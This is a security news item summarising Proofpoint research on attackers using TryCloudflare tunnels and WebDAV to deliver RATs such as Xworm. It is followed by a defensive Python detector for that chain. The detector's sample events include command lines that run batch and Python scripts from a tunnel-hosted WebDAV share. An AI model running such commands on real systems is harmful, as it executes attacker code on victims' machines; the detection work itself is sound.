Cloudflare Tunnels: From Security Tool to Attack Vector

Proofpoint has been tracking cybercriminals who use Cloudflare Tunnels to distribute malware. The attackers rely on the TryCloudflare feature, which lets anyone create a one-time tunnel without registering an account. Tunnels are designed to give remote access to data and resources, much like a VPN or SSH.

The attack chain starts with a message containing a link or attachment that leads to a .URL (Internet Shortcut) file. When opened, the file connects to external file storage over WebDAV to download an LNK or VBS file. Running either file launches a BAT or CMD script, which downloads a Python installation package and a series of scripts that end with the malware being installed. In some cases the search-ms protocol handler is used to retrieve the LNK files over WebDAV. The attackers often display a harmless decoy PDF on the victim's screen so that the user does not suspect anything.

Most recent campaigns have resulted in the installation of the Xworm RAT, but AsyncRAT, VenomRAT, GuLoader, and Remcos have also been delivered in the past. Some campaigns carry several different malware payloads, with each unique Python script installing a different piece of malware.
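As an added defender-side example (not code from the Proofpoint report or this article), the heuristics below flag constructed Windows process-creation events that match the chain described above: stage files (.url/.lnk/.vbs/.bat/.cmd) opened from a WebDAV share on a TryCloudflare hostname, the search-ms handler pointed at such a share, and a Python interpreter run against a script hosted there. The trycloudflare.com host suffix, the UNC/DavWWWRoot path form and every sample event are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass

TUNNEL_SUFFIX = "trycloudflare.com"  # assumed one-time tunnel domain
STAGE_EXTS = (".url", ".lnk", ".vbs", ".bat", ".cmd")
# UNC form Windows gives a WebDAV share, e.g. \\host@SSL\DavWWWRoot\x.lnk; group(1) = host
UNC_RE = re.compile(r"\\\\([A-Za-z0-9.-]+)(?:@SSL)?(?:@\d+)?\\", re.I)

@dataclass
class Event:
    parent: str   # parent image name
    image: str    # created process image name
    cmdline: str  # full command line

def tunnel_hosts(text: str) -> list[str]:
    """Hosts of WebDAV/UNC paths in text that end in the tunnel suffix."""
    return [h for h in UNC_RE.findall(text) if h.lower().endswith(TUNNEL_SUFFIX)]

def classify(ev: Event) -> list[str]:
    """Chain stages this event matches; an empty list means no match."""
    hosts = tunnel_hosts(ev.cmdline)
    if not hosts:
        return []
    low, reasons = ev.cmdline.lower(), []
    if any(ext in low for ext in STAGE_EXTS):
        reasons.append(f"stage file opened over WebDAV from {hosts[0]}")
    if "search-ms:" in low:
        reasons.append(f"search-ms handler pointed at WebDAV share on {hosts[0]}")
    if ev.image.lower().startswith("python"):
        reasons.append(f"Python interpreter run against a script on {hosts[0]}")
    return reasons

# Constructed sample events: three chain stages plus one benign internal share.
SAMPLE = [
    Event("explorer.exe", "cmd.exe", r'cmd.exe /c "\\abcd-efgh.trycloudflare.com@SSL\DavWWWRoot\invoice.bat"'),
    Event("explorer.exe", "explorer.exe", r'explorer.exe "search-ms:query=invoice&crumb=location:\\abcd-efgh.trycloudflare.com@SSL\DavWWWRoot"'),
    Event("cmd.exe", "python.exe", r'python.exe \\abcd-efgh.trycloudflare.com@SSL\DavWWWRoot\stage.py'),
    Event("explorer.exe", "cmd.exe", r'cmd.exe /c \\fileserver.corp.local\share\backup.bat'),
]

def alerts(events=SAMPLE) -> list[tuple[str, list[str]]]:
    """(image, reasons) for each event that matches at least one stage."""
    return [(e.image, r) for e in events if (r := classify(e))]

if __name__ == "__main__":
    for image, reasons in alerts():
        print(image, "->", "; ".join(reasons))
```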

Source: securitylab.ru